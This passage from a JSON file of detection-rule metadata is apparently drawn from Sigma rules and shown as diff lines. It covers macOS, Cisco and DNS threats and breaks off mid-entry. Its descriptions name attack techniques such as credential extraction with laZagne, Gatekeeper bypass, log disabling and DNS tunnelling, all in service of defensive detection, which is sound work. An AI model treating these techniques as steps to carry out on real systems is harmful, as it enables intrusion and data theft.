"description": "Detects usage of system utilities to discover files and directories", - "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", - "value": "File and Directory Discovery - MacOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_file_and_directory_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detecting attempts to extract passwords with grep and laZagne", - "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", - "value": "Credentials In Files", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_find_cred_in_files.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects attempts to use system dialog prompts to capture user credentials", - "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", - "value": "GUI Input Capture - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", - 
"https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1056.002" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_macos_gui_input_capture.yml", - "author": "remotephone, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration tools and activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local systeam accounts on MacOS", - "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", - "value": "Local System Accounts Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_macos_local_account.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local system groups", - "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", - "value": "Local Groups Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_macos_local_groups.yml", - "author": 
"\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local or remote network services.", - "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", - "value": "MacOS Network Service Scanning", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2020/10/21", - "filename": "proc_creation_macos_network_service_scanning.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", - "value": "Network Sniffing - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ], - "creation_date": "2020/10/14", - "filename": "proc_creation_macos_network_sniffing.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - 
"logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", - "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", - "value": "Payload Decoded and Decrypted via Built-in Utilities", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" - ], - "tags": [ - "attack.t1059", - "attack.t1204", - "attack.execution", - "attack.t1140", - "attack.defense_evasion", - "attack.s0482", - "attack.s0402" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the enumeration of other remote systems.", - "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", - "value": "Macos Remote System Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2020/10/22", - "filename": "proc_creation_macos_remote_system_discovery.yml", - "author": 
"Alejandro Ortuno, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", - "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", - "value": "Scheduled Cron Task/Job - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_macos_schedule_task_job_cron.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects attempts to use screencapture to collect macOS screenshots", - "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", - "value": "Screen Capture - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_macos_screencapture.yml", - "author": "remotephone, 
oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate user activity taking screenshots" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", - "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", - "value": "Security Software Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_security_software_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", - "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", - "value": "Space After Filename - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.006" - ], - "creation_date": "2021/11/20", - "filename": "proc_creation_macos_space_after_filename.yml", - "author": "remotephone", - "level": "low", - "falsepositive": [ - "Mistyped commands or legitimate binaries named to match the pattern" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detection use of the 
command \"split\" to split files into parts and possible transfer.", - "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", - "value": "Split A File Into Pieces", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_macos_split_file_into_pieces.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", - "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", - "value": "Suspicious Execution via macOS Script Editor", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", - "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.002", - "attack.initial_access", - "attack.t1059", - "attack.t1059.002", - "attack.t1204", - "attack.t1204.001", - "attack.execution", - "attack.persistence", - "attack.t1553", - "attack.defense_evasion" - ], - "creation_date": "2022/10/21", - "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" 
- } - }, - { - "description": "Detects commandline operations on shell history files", - "uuid": "508a9374-ad52-4789-b568-fc358def2c65", - "value": "Suspicious History File Operations", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_macos_susp_histfile_operations.yml", - "author": "Mikhail Larin, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", - "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", - "value": "Suspicious MacOS Firmware Activity", - "meta": { - "refs": [ - "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", - "https://www.manpagez.com/man/8/firmwarepasswd/", - "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/30", - "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects usage of system 
utilities to discover system network connections", - "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", - "value": "System Network Connections Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_system_network_connections_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local network configuration", - "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", - "value": "System Network Discovery - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_macos_system_network_discovery.yml", - "author": "remotephone, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", - "value": "System Shutdown/Reboot - MacOs", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_system_shutdown_reboot.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", - "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", - "value": "Potential WizardUpdate Malware Infection", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects macOS Gatekeeper bypass via xattr utility", - "uuid": 
"f5141b6d-9f42-41c6-a7bf-2a780678b29b", - "value": "Gatekeeper Bypass via Xattr", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", - "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", - "value": "Potential XCSSET Malware Infection", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_macos_xcsset_malware_infection.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Clear command history in network OS which is used for defense evasion", - "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", - 
"value": "Cisco Clear Logs", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_clear_logs.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Collect pertinent data from the configuration files", - "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", - "value": "Cisco Collect Data", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.collection", - "attack.t1087.001", - "attack.t1552.001", - "attack.t1005" - ], - "creation_date": "2019/08/11", - "filename": "cisco_cli_collect_data.yml", - "author": "Austin Clark", - "level": "low", - "falsepositive": [ - "Commonly run by administrators" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Show when private keys are being exported from the device, or when new certificates are installed", - "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", - "value": "Cisco Crypto Commands", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1553.004", - "attack.t1552.004" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_crypto_actions.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "Not commonly run by administrators. 
Also whitelist your known good certificates" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Turn off logging locally or remote", - "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", - "value": "Cisco Disabling Logging", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2019/08/11", - "filename": "cisco_cli_disable_logging.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Find information about network devices that is not stored in config files", - "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", - "value": "Cisco Discovery", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083", - "attack.t1201", - "attack.t1057", - "attack.t1018", - "attack.t1082", - "attack.t1016", - "attack.t1049", - "attack.t1033", - "attack.t1124" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_discovery.yml", - "author": "Austin Clark", - "level": "low", - "falsepositive": [ - "Commonly used by administrators for troubleshooting" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Detect a system being shutdown or put into different boot mode", - "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", - "value": "Cisco Denial of Service", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" - ], - "tags": [ - "attack.impact", - "attack.t1495", - "attack.t1529", - "attack.t1565.001" - ], - "creation_date": "2019/08/15", - "filename": "cisco_cli_dos.yml", - "author": "Austin Clark", - "level": 
"medium", - "falsepositive": [ - "Legitimate administrators may run these commands, though rarely." - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "See what files are being deleted from flash file systems", - "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", - "value": "Cisco File Deletion", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070.004", - "attack.t1561.001", - "attack.t1561.002" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_file_deletion.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Will be used sometimes by admins to clean up local flash space" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "See what commands are being input into the device by other people, full credentials can be in the history", - "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", - "value": "Cisco Show Commands Input", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ], - "creation_date": "2019/08/11", - "filename": "cisco_cli_input_capture.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Not commonly run by administrators, especially if remote logging is configured" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Find local accounts being created or modified as well as remote authentication configurations", - "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", - "value": "Cisco Local Accounts", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" - ], - "tags": [ - 
"attack.persistence", - "attack.t1136.001", - "attack.t1098" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_local_accounts.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "When remote authentication is in place, this should not change often" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Modifications to a config that will serve an adversary's impacts or persistence", - "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", - "value": "Cisco Modify Configuration", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.impact", - "attack.t1490", - "attack.t1505", - "attack.t1565.002", - "attack.t1053" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_modify_config.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Various protocols maybe used to put data on the device for exfil or infil", - "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", - "value": "Cisco Stage Data", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" - ], - "tags": [ - "attack.collection", - "attack.lateral_movement", - "attack.command_and_control", - "attack.exfiltration", - "attack.t1074", - "attack.t1105", - "attack.t1560.001" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_moving_data.yml", - "author": "Austin Clark", - "level": "low", - "falsepositive": [ - "Generally used to copy configs or IOS images" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Show when a monitor or a span/rspan is setup or modified", - "uuid": 
"b9e1f193-d236-4451-aaae-2f3d2102120d", - "value": "Cisco Sniffing", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ], - "creation_date": "2019/08/11", - "filename": "cisco_cli_net_sniff.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Admins may setup new or modify old spans, or use a monitor for troubleshooting" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", - "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", - "value": "Possible DNS Tunneling", - "meta": { - "refs": [ - "https://zeltser.com/c2-dns-tunneling/", - "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004", - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2019/04/07", - "filename": "net_dns_c2_detection.yml", - "author": "Patrick Bareiss", - "level": "high", - "falsepositive": [ - "Valid software, which uses dns for transferring data" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", - "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", - "value": "DNS Query to External Service Interaction Domains", - "meta": { - "refs": [ - "https://twitter.com/breakersall/status/1533493587828260866", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.reconnaissance", - "attack.t1595.002" - ], - "creation_date": "2022/06/07", - "filename": "net_dns_external_service_interaction_domains.yml", - "author": "Florian Roth, Matt Kelly (list of domains)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", - "value": "High DNS Bytes Out", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_bytes_out.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. 
